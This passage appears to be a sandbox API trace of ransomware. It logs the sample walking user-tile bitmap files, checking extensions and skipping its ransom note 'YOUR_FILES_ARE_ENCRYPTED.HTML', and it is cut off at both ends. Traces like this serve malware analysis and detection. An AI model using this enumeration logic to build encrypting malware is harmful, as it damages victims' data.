wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp") returned 86 [0169.968] lstrcmpW (lpString1="usertile12.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.968] PathFindExtensionW (pszPath="usertile12.bmp") returned=".bmp" [0169.968] lstrlenW (lpString=".bmp") returned 4 [0169.968] PathFindExtensionW (pszPath="usertile12.bmp") returned=".bmp" [0169.968] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527591de, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527591de, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1c4587c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xbeb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile13.bmp", cAlternateFileName="")) returned 1 [0169.968] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp") returned 86 [0169.968] lstrcmpW (lpString1="usertile13.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.968] PathFindExtensionW (pszPath="usertile13.bmp") returned=".bmp" [0169.968] lstrlenW (lpString=".bmp") returned 4 [0169.969] PathFindExtensionW (pszPath="usertile13.bmp") returned=".bmp" [0169.969] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527591de, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527591de, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1e5abbc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile14.bmp", cAlternateFileName="")) returned 1 [0169.969] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp") returned 86 [0169.969] lstrcmpW (lpString1="usertile14.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.969] PathFindExtensionW (pszPath="usertile14.bmp") returned=".bmp" [0169.969] lstrlenW (lpString=".bmp") returned 4 [0169.969] PathFindExtensionW (pszPath="usertile14.bmp") returned=".bmp" [0169.969] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5277f346, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x5277f346, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1e80d1c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile15.bmp", cAlternateFileName="")) returned 1 [0169.969] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp") returned 86 [0169.969] lstrcmpW (lpString1="usertile15.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.969] PathFindExtensionW (pszPath="usertile15.bmp") returned=".bmp" [0169.969] lstrlenW (lpString=".bmp") returned 4 [0169.969] PathFindExtensionW (pszPath="usertile15.bmp") returned=".bmp" [0169.969] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527a54ae, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527a54ae, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1ea6e7c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile16.bmp", cAlternateFileName="")) returned 1 [0169.969] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp") returned 86 [0169.969] lstrcmpW (lpString1="usertile16.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.969] PathFindExtensionW (pszPath="usertile16.bmp") returned=".bmp" [0169.969] lstrlenW (lpString=".bmp") returned 4 [0169.969] PathFindExtensionW (pszPath="usertile16.bmp") returned=".bmp" [0169.969] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527cb616, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527cb616, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1ea6e7c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile17.bmp", cAlternateFileName="")) returned 1 [0169.969] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp") returned 86 [0169.969] lstrcmpW (lpString1="usertile17.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.969] PathFindExtensionW (pszPath="usertile17.bmp") returned=".bmp" [0169.970] lstrlenW (lpString=".bmp") returned 4 [0169.970] PathFindExtensionW (pszPath="usertile17.bmp") returned=".bmp" [0169.970] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527cb616, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527cb616, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1eccfdc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile18.bmp", cAlternateFileName="")) returned 1 [0169.970] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp") returned 86 [0169.970] lstrcmpW (lpString1="usertile18.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.970] PathFindExtensionW (pszPath="usertile18.bmp") returned=".bmp" [0169.970] lstrlenW (lpString=".bmp") returned 4 [0169.970] PathFindExtensionW (pszPath="usertile18.bmp") returned=".bmp" [0169.970] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527f177e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527f177e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1ef313c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile19.bmp", cAlternateFileName="")) returned 1 [0169.970] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp") returned 86 [0169.970] lstrcmpW (lpString1="usertile19.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.970] PathFindExtensionW (pszPath="usertile19.bmp") returned=".bmp" [0169.970] lstrlenW (lpString=".bmp") returned 4 [0169.970] PathFindExtensionW (pszPath="usertile19.bmp") returned=".bmp" [0169.970] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527f177e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527f177e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1f1929c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile20.bmp", cAlternateFileName="")) returned 1 [0169.970] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp") returned 86 [0169.970] lstrcmpW (lpString1="usertile20.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.970] PathFindExtensionW (pszPath="usertile20.bmp") returned=".bmp" [0169.970] lstrlenW (lpString=".bmp") returned 4 [0169.970] PathFindExtensionW (pszPath="usertile20.bmp") returned=".bmp" [0169.970] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528178e6, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x528178e6, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1f1929c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile21.bmp", cAlternateFileName="")) returned 1 [0169.970] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp") returned 86 [0169.970] lstrcmpW (lpString1="usertile21.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.970] PathFindExtensionW (pszPath="usertile21.bmp") returned=".bmp" [0169.971] lstrlenW (lpString=".bmp") returned 4 [0169.971] PathFindExtensionW (pszPath="usertile21.bmp") returned=".bmp" [0169.971] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5283da4e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x5283da4e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1f3f3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile22.bmp", cAlternateFileName="")) returned 1 [0169.971] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp") returned 86 [0169.971] lstrcmpW (lpString1="usertile22.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.971] PathFindExtensionW (pszPath="usertile22.bmp") returned=".bmp" [0169.971] lstrlenW (lpString=".bmp") returned 4 [0169.971] PathFindExtensionW (pszPath="usertile22.bmp") returned=".bmp" [0169.971] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52863bb6, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52863bb6, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1f6555c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile23.bmp", cAlternateFileName="")) returned 1 [0169.971] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp") returned 86 [0169.971] lstrcmpW (lpString1="usertile23.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.971] PathFindExtensionW (pszPath="usertile23.bmp") returned=".bmp" [0169.971] lstrlenW (lpString=".bmp") returned 4 [0169.971] PathFindExtensionW (pszPath="usertile23.bmp") returned=".bmp" [0169.971] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528afe86, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x528afe86, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf2238f7c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile24.bmp", cAlternateFileName="")) returned 1 [0169.971] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp") returned 86 [0169.971] lstrcmpW (lpString1="usertile24.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.971] PathFindExtensionW (pszPath="usertile24.bmp") returned=".bmp" [0169.971] lstrlenW (lpString=".bmp") returned 4 [0169.971] PathFindExtensionW (pszPath="usertile24.bmp") returned=".bmp" [0169.971] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528d5fee, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x528d5fee, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf225f0dc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile25.bmp", cAlternateFileName="")) returned 1 [0169.971] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp") returned 86 [0169.971] lstrcmpW (lpString1="usertile25.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.972] PathFindExtensionW (pszPath="usertile25.bmp") returned=".bmp" [0169.972] lstrlenW (lpString=".bmp") returned 4 [0169.972] PathFindExtensionW (pszPath="usertile25.bmp") returned=".bmp" [0169.972] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528d5fee, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x528d5fee, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf228523c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile26.bmp", cAlternateFileName="")) returned 1 [0169.972] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp") returned 86 [0169.972] lstrcmpW (lpString1="usertile26.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.972] PathFindExtensionW (pszPath="usertile26.bmp") returned=".bmp" [0169.972] lstrlenW (lpString=".bmp") returned 4 [0169.972] PathFindExtensionW (pszPath="usertile26.bmp") returned=".bmp" [0169.972] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x529222be, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x529222be, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf22ab39c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile27.bmp", cAlternateFileName="")) returned 1 [0169.972] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp") returned 86 [0169.972] lstrcmpW (lpString1="usertile27.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.972] PathFindExtensionW (pszPath="usertile27.bmp") returned=".bmp" [0169.972] lstrlenW (lpString=".bmp") returned 4 [0169.972] PathFindExtensionW (pszPath="usertile27.bmp") returned=".bmp" [0169.972] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52948426, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52948426, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf22ab39c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile28.bmp", cAlternateFileName="")) returned 1 [0169.972] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp") returned 86 [0169.972] lstrcmpW (lpString1="usertile28.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.972] PathFindExtensionW (pszPath="usertile28.bmp") returned=".bmp" [0169.972] lstrlenW (lpString=".bmp") returned 4 [0169.972] PathFindExtensionW (pszPath="usertile28.bmp") returned=".bmp" [0169.972] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5296e58e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x5296e58e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf22d14fc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile29.bmp", cAlternateFileName="")) returned 1 [0169.972] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp") returned 86 [0169.973] lstrcmpW (lpString1="usertile29.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.973] PathFindExtensionW (pszPath="usertile29.bmp") returned=".bmp" [0169.973] lstrlenW (lpString=".bmp") returned 4 [0169.973] PathFindExtensionW (pszPath="usertile29.bmp") returned=".bmp" [0169.973] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x529946f6, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x529946f6, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf234391c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile30.bmp", cAlternateFileName="")) returned 1 [0169.973] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp") returned 86 [0169.973] lstrcmpW (lpString1="usertile30.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.973] PathFindExtensionW (pszPath="usertile30.bmp") returned=".bmp" [0169.973] lstrlenW (lpString=".bmp") returned 4 [0169.973] PathFindExtensionW (pszPath="usertile30.bmp") returned=".bmp" [0169.973] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x529ba85e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x529ba85e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf234391c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile31.bmp", cAlternateFileName="")) returned 1 [0169.973] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp") returned 86 [0169.973] lstrcmpW (lpString1="usertile31.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.973] PathFindExtensionW (pszPath="usertile31.bmp") returned=".bmp" [0169.973] lstrlenW (lpString=".bmp") returned 4 [0169.973] PathFindExtensionW (pszPath="usertile31.bmp") returned=".bmp" [0169.973] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a06b2e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52a06b2e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf238fbdc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile32.bmp", cAlternateFileName="")) returned 1 [0169.973] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp") returned 86 [0169.973] lstrcmpW (lpString1="usertile32.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.973] PathFindExtensionW (pszPath="usertile32.bmp") returned=".bmp" [0169.973] lstrlenW (lpString=".bmp") returned 4 [0169.973] PathFindExtensionW (pszPath="usertile32.bmp") returned=".bmp" [0169.973] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a52dfe, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52a52dfe, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf238fbdc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile33.bmp", cAlternateFileName="")) returned 1 [0169.973] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp") returned 86 [0169.974] lstrcmpW (lpString1="usertile33.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.974] PathFindExtensionW (pszPath="usertile33.bmp") returned=".bmp" [0169.974] lstrlenW (lpString=".bmp") returned 4 [0169.974] PathFindExtensionW (pszPath="usertile33.bmp") returned=".bmp" [0169.974] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a78f66, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52a78f66, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf23b5d3c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile34.bmp", cAlternateFileName="")) returned 1 [0169.974] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp") returned 86 [0169.974] lstrcmpW (lpString1="usertile34.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.974] PathFindExtensionW (pszPath="usertile34.bmp") returned=".bmp" [0169.974] lstrlenW (lpString=".bmp") returned 4 [0169.974] PathFindExtensionW (pszPath="usertile34.bmp") returned=".bmp" [0169.974] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a9f0ce, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52a9f0ce, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf23dbe9c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile35.bmp", cAlternateFileName="")) returned 1 [0169.974] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp") returned 86 [0169.974] lstrcmpW (lpString1="usertile35.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.974] PathFindExtensionW (pszPath="usertile35.bmp") returned=".bmp" [0169.974] lstrlenW (lpString=".bmp") returned 4 [0169.974] PathFindExtensionW (pszPath="usertile35.bmp") returned=".bmp" [0169.974] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52aeb39e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52aeb39e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf2401ffc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile36.bmp", cAlternateFileName="")) returned 1 [0169.974] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp") returned 86 [0169.974] lstrcmpW (lpString1="usertile36.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.975] PathFindExtensionW (pszPath="usertile36.bmp") returned=".bmp" [0169.975] lstrlenW (lpString=".bmp") returned 4 [0169.975] PathFindExtensionW (pszPath="usertile36.bmp") returned=".bmp" [0169.975] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52aeb39e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52aeb39e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf242815c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, 